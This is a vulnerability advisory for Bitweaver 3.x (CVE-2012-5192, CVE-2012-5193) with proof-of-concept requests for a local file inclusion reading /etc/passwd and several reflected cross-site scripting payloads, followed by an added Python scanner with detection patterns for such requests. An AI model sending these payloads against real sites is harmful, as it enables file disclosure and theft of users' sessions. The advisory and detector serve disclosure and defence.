Bitweaver Multiple Cross-Site Scripting and Local File Inclusion Vulnerabilities

Published: 2012-10-23
Updated: 2012-10-28

Affected systems:
Bitweaver Bitweaver 3.x
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56230
CVE ID: CVE-2012-5192,CVE-2012-5193

Bitweaver is a free, open-source web application framework and content management system.

Bitweaver 3.1 and other versions contain multiple security vulnerabilities. An attacker can exploit them to execute arbitrary script code in the browser of a user of the affected site, steal cookie-based authentication credentials, or open or run arbitrary files within the web server process.

1) Input passed via the "username" POST parameter to users/remind_password.php, via the "days" POST parameter to stats/index.php, and via the "login" POST parameter to users/register.php is returned to the user without proper sanitization. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

2) Input passed via the "textarea_id" parameter to quicktags/special_chars.php and via the "email" POST parameter to users/register.php is returned to the user without proper sanitization. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

<*Source: David Aaron
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to a local file inclusion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Performing LFI on 'overlay_type' parameter

#Request

?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.

Example:

The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the 'username' parameter available on /users/

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]

<snip>
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]

<snip>
<img src="https://www.linuxidc.com/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the 'login' parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com"
width="1000px"> into the "Username field"):


6. Performing XSS on the 'highlight' parameter:

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response
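A defender-side triage check, added here as an example (it is not part of the advisory or of Bitweaver): it percent-decodes each request until the value is stable, so the double-encoded 'highlight' payload and the null-terminated traversal string are seen as the PHP runtime would see them, and reports which field carries the suspicious content. The sample requests are rebuilt inline from the PoCs above, plus one benign request; only the Python standard library is assumed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Traversal runs and the null byte from the LFI PoC; tag names from the XSS PoCs.
TRAVERSAL = re.compile(r"(?:\.\./){2,}|\x00")
HTML_INJECTION = re.compile(r"<\s*/?\s*(?:script|iframe|img)\b", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable: the 'highlight' PoC is double-encoded (%2522 -> %22 -> ")."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_fields(raw):
    """Map each user-controlled field of one request to the finding it triggers.

    raw is a request line ('GET /path?query HTTP/1.0') or a bare form body ('a=b&c=d').
    Keys are parameter names, or 'path' when the payload rides in PATH_INFO."""
    if raw.startswith(("GET ", "POST ")):
        parts = urlsplit(raw.split(" ")[1])
        fields = [("path", parts.path)] + parse_qsl(parts.query, keep_blank_values=True)
    else:
        fields = parse_qsl(raw, keep_blank_values=True)
    findings = {}
    for name, value in fields:
        value = fully_decode(value)
        if TRAVERSAL.search(value):
            findings[name] = "lfi-traversal"
        elif HTML_INJECTION.search(value):
            findings[name] = "html-injection"
    return findings

# Constructed samples rebuilt from the advisory's PoC requests, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00 HTTP/1.0",
    "GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0",
    "GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0",
    "username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29",
    "GET /bitweaver/stats/index.php?days=30 HTTP/1.0",
]

def scan(requests=SAMPLE_REQUESTS):
    """Return {index: findings} for every request that triggered at least one finding."""
    out = {}
    for i, r in enumerate(requests):
        f = suspicious_fields(r)
        if f:
            out[i] = f
    return out

if __name__ == "__main__":
    for i, f in scan().items():
        print(i, f)
```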
